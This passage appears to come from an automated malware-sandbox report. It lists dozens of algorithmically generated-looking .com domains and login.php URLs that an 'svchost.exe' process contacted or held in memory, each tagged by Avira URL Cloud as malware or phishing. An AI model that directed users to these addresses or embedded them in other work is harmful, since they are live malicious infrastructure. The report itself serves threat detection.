                                                          		truefalse
                                                            		high
                                                            gatyzoz.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              lykygaj.com
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                qedyxel.com
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  qedyqup.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    qekyluv.com
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      gatyrez.com
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown
                                                                        vofybic.com
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          pujydag.com
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown
                                                                            vojykom.com
                                                                            		unknown
                                                                            		unknowntrue
                                                                              		unknown
                                                                              qetysuq.com
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                vonyzut.com
                                                                                		unknown
                                                                                		unknowntrue
                                                                                  		unknown
                                                                                  pufyjuq.com
                                                                                  		unknown
                                                                                  		unknowntrue
                                                                                    		unknown
                                                                                    pujytug.com
                                                                                    		unknown
                                                                                    		unknowntrue
                                                                                      		unknown
                                                                                      galyhiw.com
                                                                                      		unknown
                                                                                      		unknowntrue
                                                                                        		unknown
                                                                                        lykygun.com
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          vopymyc.com
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown
                                                                                            gatyfaz.com
                                                                                            		unknown
                                                                                            		unknowntrue
                                                                                              		unknown
                                                                                              vojycit.com
                                                                                              		unknown
                                                                                              		unknowntrue
                                                                                                		unknown
                                                                                                lyvymej.com
                                                                                                		unknown
                                                                                                		unknowntrue
                                                                                                  		unknown
                                                                                                  lygyvar.com
                                                                                                  		unknown
                                                                                                  		unknowntrue
                                                                                                    		unknown
                                                                                                    purygiv.com
                                                                                                    		unknown
                                                                                                    		unknowntrue
                                                                                                      		unknown
                                                                                                      gahykeb.com
                                                                                                      		unknown
                                                                                                      		unknowntrue
                                                                                                        		unknown
                                                                                                        purymog.com
                                                                                                        		unknown
                                                                                                        		unknowntrue
                                                                                                          		unknown
                                                                                                          gadyzib.com
                                                                                                          		unknown
                                                                                                          		unknowntrue
                                                                                                            		unknown
                                                                                                            ganyqow.com
                                                                                                            		unknown
                                                                                                            		unknowntrue
                                                                                                              		unknown
                                                                                                              lyxysun.com
                                                                                                              		unknown
                                                                                                              		unknowntrue
                                                                                                                		unknown
                                                                                                                puzyjyg.com
                                                                                                                		unknown
                                                                                                                		unknowntrue
                                                                                                                  		unknown
                                                                                                                  vopydek.com
                                                                                                                  		unknown
                                                                                                                  		unknowntrue
                                                                                                                    		unknown
                                                                                                                    qexyfuq.com
                                                                                                                    		unknown
                                                                                                                    		unknowntrue
                                                                                                                      		unknown
                                                                                                                      gatykyh.com
                                                                                                                      		unknown
                                                                                                                      		unknowntrue
                                                                                                                        		unknown
                                                                                                                        vocykem.com
                                                                                                                        		unknown
                                                                                                                        		unknowntrue
                                                                                                                          		unknown
                                                                                                                          gahynus.com
                                                                                                                          		unknown
                                                                                                                          		unknowntrue
                                                                                                                            		unknown
                                                                                                                            pumypop.com
                                                                                                                            		unknown
                                                                                                                            		unknowntrue
                                                                                                                              		unknown
                                                                                                                              lyvysur.com
                                                                                                                              		unknown
                                                                                                                              		unknowntrue
                                                                                                                                		unknown
                                                                                                                                galypob.com
                                                                                                                                		unknown
                                                                                                                                		unknowntrue
                                                                                                                                  		unknown
                                                                                                                                  puzypav.com
                                                                                                                                  		unknown
                                                                                                                                  		unknowntrue
                                                                                                                                    		unknown
                                                                                                                                    gacyqoz.com
                                                                                                                                    		unknown
                                                                                                                                    		unknowntrue
                                                                                                                                      		unknown
                                                                                                                                      lykywid.com
                                                                                                                                      		unknown
                                                                                                                                      		unknowntrue
                                                                                                                                        		unknown
                                                                                                                                        lykytin.com
                                                                                                                                        		unknown
                                                                                                                                        		unknowntrue
                                                                                                                                          		unknown
                                                                                                                                          vofyref.com
                                                                                                                                          		unknown
                                                                                                                                          		unknowntrue
                                                                                                                                            		unknown
                                                                                                                                            qekytig.com
                                                                                                                                            		unknown
                                                                                                                                            		unknowntrue
                                                                                                                                              		unknown
                                                                                                                                              vocyzek.com
                                                                                                                                              		unknown
                                                                                                                                              		unknowntrue
                                                                                                                                                		unknown
                                                                                                                                                puvypoq.com
                                                                                                                                                		unknown
                                                                                                                                                		unknowntrue
                                                                                                                                                  		unknown
                                                                                                                                                  puvybeg.com
                                                                                                                                                  		unknown
                                                                                                                                                  		unknowntrue
                                                                                                                                                    		unknown
                                                                                                                                                    pupydig.com
                                                                                                                                                    		unknown
                                                                                                                                                    		unknowntrue
                                                                                                                                                      		unknown
                                                                                                                                                      pupyguq.com
                                                                                                                                                      		unknown
                                                                                                                                                      		unknowntrue
                                                                                                                                                        		unknown
                                                                                                                                                        qedyqal.com
                                                                                                                                                        		unknown
                                                                                                                                                        		unknowntrue
                                                                                                                                                          		unknown
                                                                                                                                                          vowymom.com
                                                                                                                                                          		unknown
                                                                                                                                                          		unknowntrue
                                                                                                                                                            		unknown
                                                                                                                                                            purypol.com
                                                                                                                                                            		unknown
                                                                                                                                                            		unknowntrue
                                                                                                                                                              		unknown
                                                                                                                                                              ganypeb.com
                                                                                                                                                              		unknown
                                                                                                                                                              		unknowntrue
                                                                                                                                                                		unknown
                                                                                                                                                                vopymit.com
                                                                                                                                                                		unknown
                                                                                                                                                                		unknowntrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  vowyguf.com
                                                                                                                                                                  		unknown
                                                                                                                                                                  		unknowntrue
                                                                                                                                                                    		unknown
                                                                                                                                                                    pupytiq.com
                                                                                                                                                                    		unknown
                                                                                                                                                                    		unknowntrue
                                                                                                                                                                      		unknown
                                                                                                                                                                      lymyfoj.com
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknowntrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        vowyzuf.com
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknowntrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          gatyruw.com
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknowntrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            qebynyg.com
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknowntrue
                                                                                                                                                                              		unknown
                                                                                                                                                                              puzymev.com
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                pupymol.com
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  vojycif.com
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    qebyvyl.com
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      lymysan.com
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        qekynuq.com
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          puryjil.com
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            puvytuv.com
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            		unknowntrue
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              galyzus.com
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                gadyfuh.com
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  vofycyk.com
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    lyxywer.com
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      vojymuk.com
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        qegykeg.com
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          Contacted URLs

                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://ww16.vofycot.com/login.php?sub1=20241112-0425-1706-a2c8-02526792f211true
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://puzylyp.com/login.phptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          URLs from Memory and Binaries

                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://ganyhab.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysyfed.com/login.phpsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pupymol.com/login.phpsvchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekynog.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://volyjym.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vopycoc.com/login.phpsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vofybic.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyvytan.com/login.php9svchost.exe, 00000002.00000003.1874151632.0000000008A7F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vonymoc.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvybeg.com/Hsvchost.exe, 00000002.00000003.1836522113.0000000008B5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vopydum.com/svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vocyjet.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vofymif.com/login.phpsvchost.exe, 00000002.00000003.1919445293.0000000008A29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyryxen.com/login.phpsvchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qegyvuq.com/login.phpsvchost.exe, 00000002.00000003.1889846604.0000000002F05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojyjyc.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyvuz.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vowyrif.com/login.phpsvchost.exe, 00000002.00000003.1889846604.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://purymog.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qexynyq.com/login.phpsvchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1931887826.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galydyw.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysyvax.com/login.phpsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vocygim.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vofyqek.com/0;svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qebyqeq.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekyhil.com/login.phpsvchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gatyniz.com/svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pujylyv.com/svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pupyguq.com/login.phpsvchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvyxig.com/login.phpgsvchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lygysij.com/svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojyduf.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://volydyk.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysytoj.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pupycuv.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qetykyq.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qetyvil.com/login.phpsvchost.exe, 00000002.00000003.1871770823.0000000008BA4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vofypam.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvydyp.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lygyvuj.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysynaj.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871067961.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvypoq.com/svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzybil.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojybim.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzylyp.com/Hsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyhib.com/login.phpsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekynuq.com/http://vopypif.com/svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qetylyv.com/svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysyxar.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyxygax.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
